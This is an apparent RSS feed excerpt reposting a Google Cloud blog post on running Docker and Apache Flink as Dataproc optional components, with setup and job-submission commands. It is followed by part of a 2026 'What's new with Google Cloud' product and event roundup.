<link>https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.</p><h3>Docker container on Dataproc</h3><p>Docker is a widely used container technology. Since it’s now a Dataproc optional component, Docker daemons can now be installed on every node of the Dataproc cluster. This will give you the ability to install containerized applications and interact with Hadoop clusters easily on the cluster. </p><p>In addition, Docker is also critical to supporting these features:</p><ol><li><p>Running containers with YARN</p></li><li><p>Portable Apache Beam job</p></li></ol><p>Running containers on YARN allows you to manage dependencies of your YARN application separately, and also allows you to create containerized services on YARN. <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/DockerContainers.html" target="_blank">Get more details here.</a> Portable Apache Beam packages jobs into Docker containers and submits them the Flink cluster. Find <a href="https://beam.apache.org/roadmap/portability/" target="_blank">more detail about Beam portability</a>. </p><p>Docker optional component is also configured to use <a href="https://cloud.google.com/container-registry">Google Container Registry</a>, in addition to the default Docker registry. This lets you use container images managed by your organization.</p><p>Here is how to create a Dataproc cluster with the Docker optional component:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=DOCKER \</code><br><code>  --image-version=1.5</code></p><p>When you run the Docker application, the log will be streamed to Cloud Logging, using gcplogs driver.</p><p>If your application does not depend on any Hadoop services, check out <a href="https://kubernetes.io/" target="_blank">Kubernetes</a> and <a href="https://cloud.google.com/kubernetes-engine/docs/quickstart">Google Kubernetes Engine</a> to run containers natively. For more on using Dataproc, <a href="https://cloud.google.com/dataproc/docs">check out our documentation</a>.</p><h3>Apache Flink on Dataproc</h3><p>Among streaming analytics technologies, Apache Beam and Apache Flink stand out. Apache Flink is a distributed processing engine using stateful computation. <a href="https://beam.apache.org/get-started/beam-overview/" target="_blank">Apache Beam</a> is a unified model for defining batch and steaming processing pipelines. Using <a href="https://beam.apache.org/documentation/runners/flink/" target="_blank">Apache Flink as an execution engine</a>, you can also run Apache Beam jobs on Dataproc, in addition to Google’s Cloud Dataflow service.</p><p>Flink and running Beam on Flink are suitable for large-scale, continuous jobs, and provide:</p><ul><li><p>A streaming-first runtime that supports both batch processing and data streaming programs</p></li><li><p>A runtime that supports very high throughput and low event latency at the same time</p></li><li><p>Fault-tolerance with exactly-once processing guarantees</p></li><li><p>Natural back-pressure in streaming programs</p></li><li><p>Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms</p></li><li><p>Integration with YARN and other components of the Apache Hadoop ecosystem</p></li></ul><p>Our Dataproc team here at Google Cloud recently announced that <a href="https://cloud.google.com/blog/products/data-analytics/open-source-processing-engines-for-kubernetes">Flink Operator on Kubernetes</a> is now available. It allows you to run Apache Flink jobs in Kubernetes, bringing the benefits of reducing platform dependency and producing better hardware efficiency. </p><p><b>Basic Flink Concepts</b></p><p>A Flink cluster consists of a Flink JobManager and a set of Flink TaskManagers. Like similar roles in other distributed systems such as YARN, JobManager has responsibilities such as accepting jobs, managing resources and supervising jobs. TaskManagers are responsible for running the actual tasks. </p><p>When running Flink on Dataproc, we use YARN as resource manager for Flink. You can run Flink jobs in 2 ways: job cluster and session cluster. For the job cluster, YARN will create JobManager and TaskManagers for the job and will destroy the cluster once the job is finished. For session clusters, YARN will create JobManager and a few TaskManagers.The cluster can serve multiple jobs until being shut down by the user.</p><p><b>How to create a cluster with Flink</b></p><p>Use this command to get started:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=FLINK \</code><br><code>  --image-version=1.5</code></p><p><b>How to run a Flink job</b></p><p>After a Dataproc cluster with Flink starts, you can submit your Flink jobs to YARN directly using the Flink job cluster. After accepting the job, Flink will start a JobManager and slots for this job in YARN. The Flink job will be run in the YARN cluster until finished. The JobManager created will then be shut down. Job logs will be available in regular YARN logs. Try this command to run a word-counting example:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m yarn-cluster /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8374c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>The Dataproc cluster will not start a <a href="https://ci.apache.org/projects/flink/flink-docs-release-1.10/ops/deployment/yarn_setup.html#flink-yarn-session" target="_blank">Flink Session</a> cluster by default. Instead, Dataproc will create the script “/usr/bin/flink-yarn-daemon,” which will start a Flink session. </p><p>If you want to start a Flink session when Dataproc is created, use the metadata key to allow it:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK \\ \r\n    --image-version=1.5 \\\r\n    --metadata flink-start-yarn-session=true'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837580&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to start the Flink session after Dataproc is created, you can run the following command on master node:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ . /usr/bin/flink-yarn-daemon'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8375e0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Submit jobs to that session cluster. You’ll need to get the Flink JobManager URL:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m &lt;JOB_MANAGER_HOSTNAME&gt;:&lt;REST_API_PORT&gt; /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837640&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Java Beam job</b></p><p>It is very easy to run an Apache Beam job written in Java. There is no extra configuration needed. As long as you package your Beam jobs into a JAR file, you do not need to configure anything to run Beam on Flink. This is the command you can use:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ mvn package -Pflink-runner\r\n$ bin/flink run -c org.apache.beam.examples.WordCount /path/to/your.jar\r\n--runner=FlinkRunner --other-parameters'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8376a0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Python Beam job written in Python</b></p><p>Beam jobs written in Python use a different execution model. To run them in Flink on Dataproc, you will also need to enable the Docker optional component. Here’s how to create a cluster:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK,DOCKER'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837700&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will also need to install necessary Python libraries needed by Beam, such as apache_beam and apache_beam[gcp]. You can pass in a Flink master URL to let it run in a session cluster. If you leave the URL out, you need to use the job cluster mode to run this job:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'import apache_beam as beam\r\nfrom apache_beam.options.pipeline_options import PipelineOptions\r\n\r\noptions = PipelineOptions([\r\n    "--runner=FlinkRunner",\r\n    "--flink_version=1.9",\r\n    "--flink_master=localhost:8081",\r\n    "--environment_type=DOCKER"\r\n])\r\nwith beam.Pipeline(options=options) as p:\r\n    ...'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837760&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>After you’ve written your Python job, simply run it to submit:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ python wordcount.py'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8377c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><a href="https://cloud.google.com/dataproc">Learn more about Dataproc.</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s new with Google Cloud]]></title>
<description><![CDATA[Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud bl...]]></description>
<link>https://tsecurity.de/de/3662833/it-security-nachrichten/whats-new-with-google-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662833/it-security-nachrichten/whats-new-with-google-cloud/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p data-block-key="kgod7">Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. </p><hr><p data-block-key="ru1z9"><b>Tip</b>: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: <a href="https://cloud.google.com/blog/topics/inside-google-cloud/complete-list-google-cloud-blog-links-2021">Google Cloud blog 101: Full list of topics, links, and resources</a>.</p><hr><p data-block-key="b0lnw"></p></div>
<div class="block-aside"><dl>
    <dt>aside_block</dt>
    <dd>&lt;ListValue: []&gt;</dd>
</dl></div>
<div class="block-paragraph_advanced"><h3>Jul 6 - Jul 10</h3>
<ul>
<li><strong>Webinar: Introducing Google Cloud NGFW Enterprise advanced malware protection - powered by Palo Alto Networks<br></strong>Discover the new Cloud NGFW advanced malware sandbox, arriving in preview later this year. Powered by Palo Alto Networks Advanced Wildfire, it leverages data from 70,000+ customers to help defeat advanced malware. Join us on July 16 at 11 AM EDT to learn how to build a resilient, zero-trust cloud infrastructure that protects your apps and data, wherever they reside.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="18" href="https://www.brighttalk.com/webcast/18282/668861?utm_source=GCBlog" rel="noreferrer noopener" target="_blank">Register for the webinar now</a></li>
<li><strong>Safely run AI-generated code in Cloud Run sandboxes<br></strong>Cloud Run sandboxes, now in public preview, are lightweight, isolated execution boundaries that you can spawn near-instantly <strong>within your existing Cloud Run service instances</strong>.<br><br>Whether you need to let an LLM run a dynamically generated Python script to calculate business margins or spin up a headless browser to perform web research, Cloud Run sandboxes give you a secure, isolated sandbox to run these tasks without leaving your serverless environment.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="22" href="https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-run-sandboxes-are-in-public-preview" rel="noreferrer noopener" target="_blank">Read the blog</a><span> to learn more and get started today.</span></li>
<li><strong>Australia API Horizon: Scaling Enterprise Governed AI Agents<br></strong>The transition from AI chatbots to autonomous agents is the most critical integration point for your business. Join Google Cloud at our upcoming events to explore exclusive deep-dive sessions on architecting for the agentic era.<br><br>Discover how to use Apigee as an intelligent AI Gateway to govern, secure, and scale high-performance architectures. You will learn to seamlessly build AI tools from your existing APIs and maintain control over your entire ecosystem.<br><br>Join us in your preferred city:
<ul>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="36" href="https://goo.gle/4voh18S" rel="noreferrer noopener" target="_blank"><strong>Sydney:</strong> July 28, 2026, at Google Sydney, One Darling Island.</a></li>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="37" href="https://goo.gle/4h2x0FS" rel="noreferrer noopener" target="_blank"><strong>Canberra:</strong> July 29, 2026, at Hotel Realm.</a></li>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="38" href="https://goo.gle/4yisb1F" rel="noreferrer noopener" target="_blank"><strong>Melbourne:</strong> August 4, 2026, at Google Melbourne.</a></li>
</ul>
</li>
<li><strong>Build highly available, multi-region services on Cloud Run<br></strong>Maintaining uptime for business-critical applications just got a lot easier on Cloud Run. Service health, now Generally Available, automates cross-region failover by leveraging readiness probes for instance-level health checks with a simple, two-click setup. You can configure service health with global external Application Load Balancers for public-facing applications or cross-region internal Application Load Balancers for private networking traffic.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="42" href="https://cloud.google.com/run/docs/configuring/configure-service-health" rel="noreferrer noopener" target="_blank">Learn how to configure service health for Cloud Run.</a></li>
<li><strong>Report: 83% of organizations need infrastructure upgrades for agentic AI<br></strong>The shift from conversational bots to autonomous agents is breaking legacy systems. Our new <em>State of AI Infrastructure</em> report details how engineering leaders are adapting to these massive new workloads. To eliminate inference bottlenecks, control hidden scaling costs, and manage agent sprawl, the industry is rapidly moving toward fluid compute, centralized governance, and unified, co-designed architectures.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="46" href="https://cloud.google.com/blog/products/compute/state-of-ai-infrastructure-report-overview?e=48754805" rel="noreferrer noopener" target="_blank">Explore our key infrastructure insights</a></li>
<li><strong>Stop tinkering, start scaling: the industrialized AI Playbook<br></strong>Did you know that only 5% of custom AI investments actually return measurable business value? The problem isn’t the technology—it’s how organizations are wired to run it.<br><br>In this compelling read, Google Cloud Consulting breaks down the operational blueprint that bridges the stark gap between "cool tech experiments" and real, P&amp;L-impacting enterprise ROI.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="50" href="https://www.google.com/url?q=https%3A%2F%2Fmedium.com%2F%40kjouannigot_73547%2Fscaling-trusted-ai-google-cloud-insights-to-capture-enterprise-roi-aa6c9b308adb" rel="noreferrer noopener" target="_blank">Read the full article on Medium</a></li>
<li><strong>AI Agent Clinic: Slashing App Latency by 80%<br></strong>Prototyping an AI agent is easy, but scaling for live traffic presents unique challenges. In the latest AI Agent Clinic, our technical experts partner with a developer to optimize PlaybackIQ, a live football analysis agent. This session demonstrates how to use OpenTelemetry to trace bottlenecks in the Gemini Enterprise Agent Platform and deploy to Cloud Run for high-concurrency scaling, achieving an 80% reduction in response time. Learn production-grade debugging strategies to optimize your own LLM applications.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="54" href="https://www.google.com/search?q=https://youtu.be/G7olcqETSn8" rel="noreferrer noopener" target="_blank">Watch the 60-minute teardown</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 29 - Jul 3</h3>
<ul>
<li><strong>Claude Sonnet 5, Anthropic’s latest model, is now available on Agent Platform</strong>. <br>This addition serves as a drop-in replacement for Sonnet 4.6, giving organizations expanded choice for task completion across enterprise workflows. It features enhanced reasoning, cleaner code generation, and computer use capabilities for desktop and browser workflows.<br><br>By continuing to rapidly bring frontier models to our platform, Google Cloud offers an uncompromised choice of the industry's best technology to build, test, and scale enterprise-grade AI.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/agent-platform/publishers/anthropic/model-garden/claude-sonnet-5?hl=en" rel="noreferrer noopener" target="_blank"><em>Get started today.</em></a></li>
<li>
<p><strong>Automate your AI governance with Apigee and YAML<br></strong><span>Manual API gateway configurations can quickly slow down your AI engineering velocity. Join the Apigee community on Thursday, July 16, to discover an automated, declarative blueprint for model garden management. Learn how a simple, repeatable YAML pattern lets your AI practitioners instantly spin up secure, policy-backed enterprise configurations  without friction. Bring your questions and connect during our live Q&amp;A session. </span></p>
<p><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 16 Community TechTalk</strong></a></p>
</li>
<li>
<p><strong>Build next-generation AI portals for autonomous agents<br></strong><span>Standard developer portals were designed for human developers to subscribe to static APIs. Today, autonomous agents, LLM toolkits, and dynamic runtimes demand a central nervous system for governance. Join our technical deep dive on Thursday, July 23, to explore Apigee's new AI Portals solution. You will see exactly how to deploy full-service, MCP powered hubs to safely manage enterprise self-service for models, tools, and agents. </span></p>
<p><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 23 Community TechTalk</strong></a></p>
</li>
<li><strong>Protect your infrastructure from advanced cyberattacks at the API layer (Presented in Portuguese)<br></strong>In an era of increasingly sophisticated threats, relying solely on traditional firewalls leaves critical data gaps. Join our technical community TechTalk on Thursday, July 30—conducted in Portuguese—to learn how to proactively mitigate risks directly at the gateway layer. This session demonstrates how to configure and govern essential Apigee security policies to build a robust line of defense, ensuring maximum availability and complete integrity for your enterprise microservices. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 30 Portuguese Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 22 - Jun 26</h3>
<ul>
<li><strong>Accelerate TPU model loading while saving RAM on GKE.<br></strong>Large model cold starts often stall scaling and leave high-value TPUs idle. The open-source <strong>Run:ai Model Streamer</strong> now natively supports TPUs with Google Cloud Storage in<strong> </strong><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://github.com/vllm-project/tpu-inference" rel="noreferrer noopener" target="_blank"><strong>TPU vLLM 0.18.0</strong>.</a> This integration accelerates inference pipelines on GKE by streaming tensors directly into CPU memory, bypassing local disk bottlenecks and the "double-buffering" trap. In benchmarks, loading a 480B parameter model was <strong>over 2x faster</strong> while cutting peak host memory usage by half. <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/accelerate-tpu-model-loading-while-saving-ram-on-gke/374835" rel="noreferrer noopener" target="_blank"><strong>Read the full guide and get started today</strong></a>.</li>
<li><strong>Stop Training Blind: Scaling AI with the New OpenTelemetry-Based TPU AI Telemetry Collector Agent<br></strong>Google Cloud’s new AI Telemetry Collector agent standardizes TPU monitoring using OpenTelemetry. It optimizes enterprise ML workloads by identifying silent failures and providing zero-cost operational metrics without draining host CPU cycles. The agent seamlessly routes telemetry to Google Cloud Monitoring or Prometheus and custom Grafana setups. Pre-installed on Google-optimized Ubuntu images or available via Docker, it tracks memory, network latency, and core utilization to maximize multi-node training efficiency.<br><br>You can read more of this capability by clicking this <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/stop-training-blind-scaling-ai-with-the-new-opentelemetry-based-tpu-ai-telemetry-collector-agent/375210" rel="noreferrer noopener" target="_blank">link</a>.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 15 - Jun 19</h3>
<ul>
<li><strong>Join us for a deep dive into agentic AI control with AppyThings<br></strong>Your integrations aren’t failing—they are evolving. When users interact with AI agents, they no longer arrive directly at your site, resulting in experiences stripped of your context, expertise, and intended experience. Join us on Thursday, June 25, for a community tech talk in partnership with AppyThings to learn how to solve this new gateway challenge. We will explore how MTN laid an integration foundation with the Model Context Protocol (MCP) to deliver accurate, consistent experiences. Our technical experts will demonstrate how to leverage Apigee as a centralized tools management solution to govern agent access. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/3Sfle0y" rel="noreferrer noopener" target="_blank"><strong>Register for the session</strong></a></li>
<li><strong>Optimize Spot VM Deployments with Capacity Advisor for Spot, Now in Public Preview<br></strong>Google Compute Engine has launched <strong>Capacity Advisor for Spot</strong> to Public Preview, now open to all customers. This tool turns Spot capacity discovery into a data-driven process by providing real-time deployment recommendations to maximize obtainability and minimize preemption risks. Query the <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank"><strong>Capacity Advisor API</strong></a> for obtainability and minimum estimated uptimes, or use the new <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/compute/capacityAdvisor" rel="noreferrer noopener" target="_blank"><strong>Console UI</strong></a> featuring a global availability map, spot price lookups, and historical preemption rate trends to visually find the most cost-efficient compute capacity.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank">Get started today</a> to start optimizing your Spot VM deployments!</li>
<li><strong>Build a multi-tenant agentic AI system<br></strong>When scaling generative AI across different business units, your teams need specialized AI agents with unique operational rules and tools. Our new reference architecture helps you build a centralized multi-tenant platform to prevent fragmented silos, eliminate data exposure risks, and maintain unified compliance. Read the guide to <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/architecture/multi-tenant-agentic-ai-system" rel="noreferrer noopener" target="_blank">design and deploy a multi-tenant agentic AI system</a> in Google Cloud.</li>
<li><strong>How to Configure Gemini Enterprise to Connect to a Custom MCP Server<br></strong>The Gemini Enterprise MCP Connector was a big announcement at Google Cloud Next because it introduces the ability to connect Gemini Enterprise to MCP servers. This blog <a href="https://medium.com/google-cloud/how-to-configure-gemini-enterprise-to-connect-to-a-custom-mcp-server-2e28adc96420" rel="noopener" target="_blank">post</a> provides a step-by-step guide on how to configure your first Custom MCP Server connector using the Google Maps Ground Lite MCP server as an example. Once you understand this flow, you can configure multiple MCP servers with Gemini Enterprise to bring all the context you need.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 8 - Jun 12</h3>
<ul>
<li><strong>Simplify Multi-Cloud Planning with Cloud Location Finder, now Generally Available</strong> <br>Cloud Location Finder provides up-to-date data on public regions, zones, and Google Distributed Cloud Connected locations across Google Cloud, AWS, Azure, and OCI. You can now programmatically discover locations based on provider, proximity, territory, and carbon footprint to optimize your global infrastructure strategy for performance, compliance, and sustainability. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="14" href="https://cloud.google.com/location-finder/docs" rel="noreferrer noopener" target="_blank">Get started for free today</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 1 - Jun 5</h3>
<ul>
<li><strong>Modeling the physical world with BigQuery Graph</strong><br>Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://cloud.google.com/blog/products/data-analytics/modeling-a-digital-twin-using-bigquery-graph" rel="noreferrer noopener" target="_blank">post</a>, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.</li>
<li><strong>Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)<br></strong>Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4dyC2Ie" rel="noreferrer noopener" target="_blank"><strong>Register for the June 18 Spanish Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 25 - May 29</h3>
<ul>
<li>
<p><strong><a href="https://www.anthropic.com/news/claude-opus-4-8" rel="noopener" target="_blank"><span>Anthropic’s Claude Opus 4.8</span></a><span> is now available on </span><a href="https://console.cloud.google.com/vertex-ai/publishers/anthropic/model-garden/claude-opus-4-8"><span>Gemini Enterprise Agent Platform</span></a></strong><span><strong>. </strong></span><span>As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.</span></p>
</li>
<li><strong>API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs <br></strong>Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.<strong><br><br><a href="https://goo.gle/4dTxQmo" rel="noopener" target="_blank">Register now</a></strong></li>
<li><strong>Securing AI Agents: The Extended Agent Gateway Pattern<br></strong>Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.<br><br><a href="https://goo.gle/4fbAsxg" rel="noopener" target="_blank"><strong>Register for the June 4 Community TechTalk</strong></a></li>
<li><strong>API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP<br></strong>Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.<br><br><a href="https://goo.gle/4nVyjIr" rel="noopener" target="_blank"><strong>Register for the June 11 Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 18 - May 22</h3>
<ul>
<li><strong>Chinese Webinar | June 4: AI Command and Control<br></strong>As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.<br><br><a href="https://goo.gle/4dx4Lf5" rel="noopener" target="_blank">Register here</a></li>
<li><strong>GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases<br></strong>Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new <a href="https://cloud.google.com/blog/products/ai-machine-learning/benchmark-llms-on-device-with-ai-edge-portal" rel="noopener" target="_blank">capabilities</a> to benchmark and debug LLM performance across these devices. <a href="https://docs.google.com/forms/d/e/1FAIpQLSfTcGPycQve8TLAsfH46pBlXBZe9FrgJAClwbF7DeL1LgVn4Q/viewform" rel="noopener" target="_blank">Sign-up</a> to utilize these new features in private preview today.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 11 - May 15</h3>
<ul>
<li><strong>Build Your AI &amp; MCP Control Tower for Universal Governance<br></strong>Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.<br><br><a href="https://goo.gle/4u9slWF" rel="noopener" target="_blank">Register for the May 21 Community TechTalk</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 27 - May 1</h3>
<ul>
